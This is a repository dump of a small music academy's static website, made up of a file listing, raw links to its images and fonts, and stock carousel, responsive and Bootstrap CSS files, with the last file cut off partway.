├── applogo.png ├── images ├── G-1.jpeg ├── G-1.jpg ├── G-2.jpeg ├── G-3.jpeg ├── G-4.jpeg ├── G-5.jpeg ├── G-6.jpeg ├── G-7.jpeg ├── S-1.png ├── S-2.jpeg ├── S-2.jpg ├── S-2.png ├── S-2.png~ ├── S-2.webp ├── S-3.png ├── S-3.png~ ├── S-4.png ├── S-4.png~ ├── S-5.png ├── S-5.webp ├── S-6.png ├── S-6.png~ ├── icon.png ├── logo.png ├── test.png ├── G-2.jpeg~ ├── G-3.jpeg~ ├── G-4.jpeg~ ├── G-5.jpeg~ ├── G-6.jpeg~ ├── banner.jpg ├── banner2.jpg ├── bbnner.png ├── footer.jpg ├── footer.jpg~ ├── icon.png~ ├── loading.gif ├── logo.png~ ├── tabla.wav ├── topicon.png ├── about_img.jpg ├── menu_btn.png ├── mics_img1.jpg ├── mics_img2.jpg ├── mics_img3.jpg ├── mics_img4.jpg ├── mics_img5.jpg ├── mics_img6.jpg ├── newbanner.jpg ├── service1.png ├── service2.png ├── service3.png ├── icon_right.png └── right_side.png ├── fonts ├── FontAwesome.otf ├── IcoMoon-Free.ttf ├── Poppins-Black.ttf ├── Poppins-Bold.ttf ├── Poppins-Light.ttf ├── Poppins-Thin.ttf ├── Poppins-Italic.ttf ├── Poppins-Medium.ttf ├── Poppins-Regular.ttf ├── Poppins-BoldItalic.ttf ├── Poppins-ExtraBold.ttf ├── Poppins-ExtraLight.ttf ├── Poppins-SemiBold.ttf ├── Poppins-ThinItalic.ttf ├── Poppins-BlackItalic.ttf ├── Poppins-LightItalic.ttf ├── Poppins-MediumItalic.ttf ├── fontawesome-webfont.eot ├── fontawesome-webfont.ttf ├── fontawesome-webfont.woff ├── Poppins-ExtraBoldItalic.ttf ├── Poppins-SemiBoldItalic.ttf ├── fontawesome-webfont.woff2 └── Poppins-ExtraLightItalic.ttf ├── css ├── owl.theme.default.min.css ├── owl.theme.green.min.css ├── owl.theme.green.css ├── owl.theme.default.css ├── responsive.css ├── owl.carousel.min.css ├── bootstrap-reboot.min.css ├── meanmenu.css ├── owl.carousel.css ├── bootstrap-reboot.css ├── style.css ├── bootstrap-reboot.min.css.map ├── bootstrap-grid.min.css └── font-awesome.min.css ├── js ├── custom.js ├── jquery-3.0.0.min.js └── popper.min.js └── index.html /applogo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/applogo.png -------------------------------------------------------------------------------- /images/G-1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-1.jpeg -------------------------------------------------------------------------------- /images/G-1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-1.jpg -------------------------------------------------------------------------------- /images/G-2.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-2.jpeg -------------------------------------------------------------------------------- /images/G-3.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-3.jpeg -------------------------------------------------------------------------------- /images/G-4.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-4.jpeg -------------------------------------------------------------------------------- /images/G-5.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-5.jpeg -------------------------------------------------------------------------------- /images/G-6.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-6.jpeg -------------------------------------------------------------------------------- /images/G-7.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-7.jpeg -------------------------------------------------------------------------------- /images/S-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-1.png -------------------------------------------------------------------------------- /images/S-2.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-2.jpeg -------------------------------------------------------------------------------- /images/S-2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-2.jpg -------------------------------------------------------------------------------- /images/S-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-2.png -------------------------------------------------------------------------------- /images/S-2.png~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-2.png~ -------------------------------------------------------------------------------- /images/S-2.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-2.webp -------------------------------------------------------------------------------- /images/S-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-3.png -------------------------------------------------------------------------------- /images/S-3.png~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-3.png~ -------------------------------------------------------------------------------- /images/S-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-4.png -------------------------------------------------------------------------------- /images/S-4.png~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-4.png~ -------------------------------------------------------------------------------- /images/S-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-5.png -------------------------------------------------------------------------------- /images/S-5.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-5.webp -------------------------------------------------------------------------------- /images/S-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-6.png -------------------------------------------------------------------------------- /images/S-6.png~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/S-6.png~ -------------------------------------------------------------------------------- /images/icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/icon.png -------------------------------------------------------------------------------- /images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/logo.png -------------------------------------------------------------------------------- /images/test.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/test.png -------------------------------------------------------------------------------- /images/G-2.jpeg~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-2.jpeg~ -------------------------------------------------------------------------------- /images/G-3.jpeg~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-3.jpeg~ -------------------------------------------------------------------------------- /images/G-4.jpeg~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-4.jpeg~ -------------------------------------------------------------------------------- /images/G-5.jpeg~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-5.jpeg~ -------------------------------------------------------------------------------- /images/G-6.jpeg~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/G-6.jpeg~ -------------------------------------------------------------------------------- /images/banner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/banner.jpg -------------------------------------------------------------------------------- /images/banner2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/banner2.jpg -------------------------------------------------------------------------------- /images/bbnner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/bbnner.png -------------------------------------------------------------------------------- /images/footer.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/footer.jpg -------------------------------------------------------------------------------- /images/footer.jpg~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/footer.jpg~ -------------------------------------------------------------------------------- /images/icon.png~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/icon.png~ -------------------------------------------------------------------------------- /images/loading.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/loading.gif -------------------------------------------------------------------------------- /images/logo.png~: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/logo.png~ -------------------------------------------------------------------------------- /images/tabla.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/tabla.wav -------------------------------------------------------------------------------- /images/topicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/topicon.png -------------------------------------------------------------------------------- /images/about_img.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/about_img.jpg -------------------------------------------------------------------------------- /images/menu_btn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/menu_btn.png -------------------------------------------------------------------------------- /images/mics_img1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/mics_img1.jpg -------------------------------------------------------------------------------- /images/mics_img2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/mics_img2.jpg -------------------------------------------------------------------------------- /images/mics_img3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/mics_img3.jpg -------------------------------------------------------------------------------- /images/mics_img4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/mics_img4.jpg -------------------------------------------------------------------------------- /images/mics_img5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/mics_img5.jpg -------------------------------------------------------------------------------- /images/mics_img6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/mics_img6.jpg -------------------------------------------------------------------------------- /images/newbanner.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/newbanner.jpg -------------------------------------------------------------------------------- /images/service1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/service1.png -------------------------------------------------------------------------------- /images/service2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/service2.png -------------------------------------------------------------------------------- /images/service3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/service3.png -------------------------------------------------------------------------------- /fonts/FontAwesome.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/FontAwesome.otf -------------------------------------------------------------------------------- /fonts/IcoMoon-Free.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/IcoMoon-Free.ttf -------------------------------------------------------------------------------- /fonts/Poppins-Black.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-Black.ttf -------------------------------------------------------------------------------- /fonts/Poppins-Bold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-Bold.ttf -------------------------------------------------------------------------------- /fonts/Poppins-Light.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-Light.ttf -------------------------------------------------------------------------------- /fonts/Poppins-Thin.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-Thin.ttf -------------------------------------------------------------------------------- /images/icon_right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/icon_right.png -------------------------------------------------------------------------------- /images/right_side.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/images/right_side.png -------------------------------------------------------------------------------- /fonts/Poppins-Italic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-Italic.ttf -------------------------------------------------------------------------------- /fonts/Poppins-Medium.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-Medium.ttf -------------------------------------------------------------------------------- /fonts/Poppins-Regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-Regular.ttf -------------------------------------------------------------------------------- /fonts/Poppins-BoldItalic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-BoldItalic.ttf -------------------------------------------------------------------------------- /fonts/Poppins-ExtraBold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-ExtraBold.ttf -------------------------------------------------------------------------------- /fonts/Poppins-ExtraLight.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-ExtraLight.ttf -------------------------------------------------------------------------------- /fonts/Poppins-SemiBold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-SemiBold.ttf -------------------------------------------------------------------------------- /fonts/Poppins-ThinItalic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-ThinItalic.ttf -------------------------------------------------------------------------------- /fonts/Poppins-BlackItalic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-BlackItalic.ttf -------------------------------------------------------------------------------- /fonts/Poppins-LightItalic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-LightItalic.ttf -------------------------------------------------------------------------------- /fonts/Poppins-MediumItalic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-MediumItalic.ttf -------------------------------------------------------------------------------- /fonts/fontawesome-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/fontawesome-webfont.eot -------------------------------------------------------------------------------- /fonts/fontawesome-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/fontawesome-webfont.ttf -------------------------------------------------------------------------------- /fonts/fontawesome-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/fontawesome-webfont.woff -------------------------------------------------------------------------------- /fonts/Poppins-ExtraBoldItalic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-ExtraBoldItalic.ttf -------------------------------------------------------------------------------- /fonts/Poppins-SemiBoldItalic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-SemiBoldItalic.ttf -------------------------------------------------------------------------------- /fonts/fontawesome-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/fontawesome-webfont.woff2 -------------------------------------------------------------------------------- /fonts/Poppins-ExtraLightItalic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abishek-raghavan/Ommusicacademy/HEAD/fonts/Poppins-ExtraLightItalic.ttf -------------------------------------------------------------------------------- /css/owl.theme.default.min.css: -------------------------------------------------------------------------------- 1 | /** 2 | * Owl Carousel v2.3.4 3 | * Copyright 2013-2018 David Deutsch 4 | * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE 5 | */ 6 | .owl-theme .owl-dots,.owl-theme .owl-nav{text-align:center;-webkit-tap-highlight-color:transparent}.owl-theme .owl-nav{margin-top:10px}.owl-theme .owl-nav [class*=owl-]{color:#FFF;font-size:14px;margin:5px;padding:4px 7px;background:#D6D6D6;display:inline-block;cursor:pointer;border-radius:3px}.owl-theme .owl-nav [class*=owl-]:hover{background:#869791;color:#FFF;text-decoration:none}.owl-theme .owl-nav .disabled{opacity:.5;cursor:default}.owl-theme .owl-nav.disabled+.owl-dots{margin-top:10px}.owl-theme .owl-dots .owl-dot{display:inline-block;zoom:1}.owl-theme .owl-dots .owl-dot span{width:10px;height:10px;margin:5px 7px;background:#D6D6D6;display:block;-webkit-backface-visibility:visible;transition:opacity .2s ease;border-radius:30px}.owl-theme .owl-dots .owl-dot.active span,.owl-theme .owl-dots .owl-dot:hover span{background:#869791} -------------------------------------------------------------------------------- /css/owl.theme.green.min.css: -------------------------------------------------------------------------------- 1 | /** 2 | * Owl Carousel v2.3.4 3 | * Copyright 2013-2018 David Deutsch 4 | * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE 5 | */ 6 | .owl-theme .owl-dots,.owl-theme .owl-nav{text-align:center;-webkit-tap-highlight-color:transparent}.owl-theme .owl-nav{margin-top:10px}.owl-theme .owl-nav [class*=owl-]{color:#FFF;font-size:14px;margin:5px;padding:4px 7px;background:#D6D6D6;display:inline-block;cursor:pointer;border-radius:3px}.owl-theme .owl-nav [class*=owl-]:hover{background:#4DC7A0;color:#FFF;text-decoration:none}.owl-theme .owl-nav .disabled{opacity:.5;cursor:default}.owl-theme .owl-nav.disabled+.owl-dots{margin-top:10px}.owl-theme .owl-dots .owl-dot{display:inline-block;zoom:1}.owl-theme .owl-dots .owl-dot span{width:10px;height:10px;margin:5px 7px;background:#D6D6D6;display:block;-webkit-backface-visibility:visible;transition:opacity .2s ease;border-radius:30px}.owl-theme .owl-dots .owl-dot.active span,.owl-theme .owl-dots .owl-dot:hover span{background:#4DC7A0} -------------------------------------------------------------------------------- /css/owl.theme.green.css: -------------------------------------------------------------------------------- 1 | /** 2 | * Owl Carousel v2.3.4 3 | * Copyright 2013-2018 David Deutsch 4 | * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE 5 | */ 6 | /* 7 | * Green theme - Owl Carousel CSS File 8 | */ 9 | .owl-theme .owl-nav { 10 | margin-top: 10px; 11 | text-align: center; 12 | -webkit-tap-highlight-color: transparent; } 13 | .owl-theme .owl-nav [class*='owl-'] { 14 | color: #FFF; 15 | font-size: 14px; 16 | margin: 5px; 17 | padding: 4px 7px; 18 | background: #D6D6D6; 19 | display: inline-block; 20 | cursor: pointer; 21 | border-radius: 3px; } 22 | .owl-theme .owl-nav [class*='owl-']:hover { 23 | background: #4DC7A0; 24 | color: #FFF; 25 | text-decoration: none; } 26 | .owl-theme .owl-nav .disabled { 27 | opacity: 0.5; 28 | cursor: default; } 29 | 30 | .owl-theme .owl-nav.disabled + .owl-dots { 31 | margin-top: 10px; } 32 | 33 | .owl-theme .owl-dots { 34 | text-align: center; 35 | -webkit-tap-highlight-color: transparent; } 36 | .owl-theme .owl-dots .owl-dot { 37 | display: inline-block; 38 | zoom: 1; 39 | *display: inline; } 40 | .owl-theme .owl-dots .owl-dot span { 41 | width: 10px; 42 | height: 10px; 43 | margin: 5px 7px; 44 | background: #D6D6D6; 45 | display: block; 46 | -webkit-backface-visibility: visible; 47 | transition: opacity 200ms ease; 48 | border-radius: 30px; } 49 | .owl-theme .owl-dots .owl-dot.active span, .owl-theme .owl-dots .owl-dot:hover span { 50 | background: #4DC7A0; } 51 | -------------------------------------------------------------------------------- /css/owl.theme.default.css: -------------------------------------------------------------------------------- 1 | /** 2 | * Owl Carousel v2.3.4 3 | * Copyright 2013-2018 David Deutsch 4 | * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE 5 | */ 6 | /* 7 | * Default theme - Owl Carousel CSS File 8 | */ 9 | .owl-theme .owl-nav { 10 | margin-top: 10px; 11 | text-align: center; 12 | -webkit-tap-highlight-color: transparent; } 13 | .owl-theme .owl-nav [class*='owl-'] { 14 | color: #FFF; 15 | font-size: 14px; 16 | margin: 5px; 17 | padding: 4px 7px; 18 | background: #D6D6D6; 19 | display: inline-block; 20 | cursor: pointer; 21 | border-radius: 3px; } 22 | .owl-theme .owl-nav [class*='owl-']:hover { 23 | background: #869791; 24 | color: #FFF; 25 | text-decoration: none; } 26 | .owl-theme .owl-nav .disabled { 27 | opacity: 0.5; 28 | cursor: default; } 29 | 30 | .owl-theme .owl-nav.disabled + .owl-dots { 31 | margin-top: 10px; } 32 | 33 | .owl-theme .owl-dots { 34 | text-align: center; 35 | -webkit-tap-highlight-color: transparent; } 36 | .owl-theme .owl-dots .owl-dot { 37 | display: inline-block; 38 | zoom: 1; 39 | *display: inline; } 40 | .owl-theme .owl-dots .owl-dot span { 41 | width: 10px; 42 | height: 10px; 43 | margin: 5px 7px; 44 | background: #D6D6D6; 45 | display: block; 46 | -webkit-backface-visibility: visible; 47 | transition: opacity 200ms ease; 48 | border-radius: 30px; } 49 | .owl-theme .owl-dots .owl-dot.active span, .owl-theme .owl-dots .owl-dot:hover span { 50 | background: #869791; } 51 | -------------------------------------------------------------------------------- /css/responsive.css: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------- 2 | File Name: responsive.css 3 | ---------------------------------------------------------------------*/ 4 | 5 | @media (min-width: 1343px) and (max-width: 1500px) {} 6 | 7 | @media (min-width: 1200px) and (max-width: 1342px) {} 8 | 9 | @media (min-width: 992px) and (max-width: 1199px) { 10 | .banner_main .bluid h1 { 11 | font-size: 110px; 12 | line-height: 136px; 13 | } 14 | .about_img { 15 | padding-right: 0; 16 | } 17 | .helpful ul li { 18 | padding-right: 22px; 19 | } 20 | } 21 | 22 | @media (min-width: 768px) and (max-width: 991px) { 23 | .titlepage h2 { 24 | font-size: 37px; 25 | line-height: 41px; 26 | } 27 | .service_img { 28 | height: 226px; 29 | width: 226px; 30 | } 31 | .about_img { 32 | padding-right: 0; 33 | } 34 | .helpful ul li { 35 | padding-right: 2px; 36 | } 37 | } 38 | 39 | @media (min-width: 576px) and (max-width: 767px) { 40 | .airmic { 41 | margin-top: 40px; 42 | margin-bottom: 30px; 43 | } 44 | .about_img { 45 | padding-right: 0; 46 | } 47 | .about_img figure img { 48 | padding-top: 30px; 49 | } 50 | } 51 | 52 | @media (max-width: 575px) { 53 | header { 54 | padding: 33px 0px; 55 | } 56 | .d_none { 57 | display: none !important; 58 | } 59 | ul.email { 60 | margin-top: -43px; 61 | } 62 | .logo { 63 | display: block; 64 | width: 144px; 65 | float: left; 66 | } 67 | .airmic { 68 | padding-top: 60px; 69 | margin-bottom: 30px; 70 | } 71 | .airmic h1 { 72 | font-size: 53px; 73 | line-height: 53px; 74 | } 75 | #top_section { 76 | height: 100%; 77 | } 78 | .banner_main .bluid .read_more { 79 | margin-right: 5px; 80 | max-width: 124px; 81 | height: 48px; 82 | line-height: 48px; 83 | font-size: 16px; 84 | } 85 | .titlepage h2 { 86 | font-size: 35px; 87 | line-height: 40px; 88 | } 89 | .about .titlepage { 90 | padding-bottom: 40px; 91 | } 92 | .testomoniam_text { 93 | padding: 40px 25px; 94 | } 95 | .about_img { 96 | padding-right: 0; 97 | } 98 | .mics { 99 | width: 290px; 100 | } 101 | .mics_icon { 102 | width: 261px; 103 | } 104 | .d_none { 105 | display: none; 106 | } 107 | } -------------------------------------------------------------------------------- /css/owl.carousel.min.css: -------------------------------------------------------------------------------- 1 | /** 2 | * Owl Carousel v2.3.4 3 | * Copyright 2013-2018 David Deutsch 4 | * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE 5 | */ 6 | .owl-carousel,.owl-carousel .owl-item{-webkit-tap-highlight-color:transparent;position:relative}.owl-carousel{display:none;width:100%;z-index:1}.owl-carousel .owl-stage{position:relative;-ms-touch-action:pan-Y;touch-action:manipulation;-moz-backface-visibility:hidden}.owl-carousel .owl-stage:after{content:".";display:block;clear:both;visibility:hidden;line-height:0;height:0}.owl-carousel .owl-stage-outer{position:relative;overflow:hidden;-webkit-transform:translate3d(0,0,0)}.owl-carousel .owl-item,.owl-carousel .owl-wrapper{-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden;-ms-backface-visibility:hidden;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0)}.owl-carousel .owl-item{min-height:1px;float:left;-webkit-backface-visibility:hidden;-webkit-touch-callout:none}.owl-carousel .owl-item img{display:block;width:100%}.owl-carousel .owl-dots.disabled,.owl-carousel .owl-nav.disabled{display:none}.no-js .owl-carousel,.owl-carousel.owl-loaded{display:block}.owl-carousel .owl-dot,.owl-carousel .owl-nav .owl-next,.owl-carousel .owl-nav .owl-prev{cursor:pointer;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.owl-carousel .owl-nav button.owl-next,.owl-carousel .owl-nav button.owl-prev,.owl-carousel button.owl-dot{background:0 0;color:inherit;border:none;padding:0!important;font:inherit}.owl-carousel.owl-loading{opacity:0;display:block}.owl-carousel.owl-hidden{opacity:0}.owl-carousel.owl-refresh .owl-item{visibility:hidden}.owl-carousel.owl-drag .owl-item{-ms-touch-action:pan-y;touch-action:pan-y;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.owl-carousel.owl-grab{cursor:move;cursor:grab}.owl-carousel.owl-rtl{direction:rtl}.owl-carousel.owl-rtl .owl-item{float:right}.owl-carousel .animated{animation-duration:1s;animation-fill-mode:both}.owl-carousel .owl-animated-in{z-index:0}.owl-carousel .owl-animated-out{z-index:1}.owl-carousel .fadeOut{animation-name:fadeOut}@keyframes fadeOut{0%{opacity:1}100%{opacity:0}}.owl-height{transition:height .5s ease-in-out}.owl-carousel .owl-item .owl-lazy{opacity:0;transition:opacity .4s ease}.owl-carousel .owl-item .owl-lazy:not([src]),.owl-carousel .owl-item .owl-lazy[src^=""]{max-height:0}.owl-carousel .owl-item img.owl-lazy{transform-style:preserve-3d}.owl-carousel .owl-video-wrapper{position:relative;height:100%;background:#000}.owl-carousel .owl-video-play-icon{position:absolute;height:80px;width:80px;left:50%;top:50%;margin-left:-40px;margin-top:-40px;background:url(owl.video.play.png) no-repeat;cursor:pointer;z-index:1;-webkit-backface-visibility:hidden;transition:transform .1s ease}.owl-carousel .owl-video-play-icon:hover{-ms-transform:scale(1.3,1.3);transform:scale(1.3,1.3)}.owl-carousel .owl-video-playing .owl-video-play-icon,.owl-carousel .owl-video-playing .owl-video-tn{display:none}.owl-carousel .owl-video-tn{opacity:0;height:100%;background-position:center center;background-repeat:no-repeat;background-size:contain;transition:opacity .4s ease}.owl-carousel .owl-video-frame{position:relative;z-index:1;height:100%;width:100%} -------------------------------------------------------------------------------- /css/bootstrap-reboot.min.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap Reboot v4.1.0 (https://getbootstrap.com/) 3 | * Copyright 2011-2018 The Bootstrap Authors 4 | * Copyright 2011-2018 Twitter, Inc. 5 | * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) 6 | * Forked from Normalize.css, licensed MIT (https://github.com/necolas/normalize.css/blob/master/LICENSE.md) 7 | */*,::after,::before{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-ms-overflow-style:scrollbar;-webkit-tap-highlight-color:transparent}@-ms-viewport{width:device-width}article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}body{margin:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;background-color:#fff}[tabindex="-1"]:focus{outline:0!important}hr{box-sizing:content-box;height:0;overflow:visible}h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem}p{margin-top:0;margin-bottom:1rem}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 